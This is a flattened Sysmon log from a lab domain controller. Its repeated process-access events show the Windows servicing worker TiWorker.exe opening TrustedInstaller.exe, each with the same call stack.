13:30:30.263{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.263{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.248{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.248{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.248{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.248{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.248{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.232{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.232{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.232{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.232{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.232{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.232{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.217{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.217{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.217{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.217{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.217{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 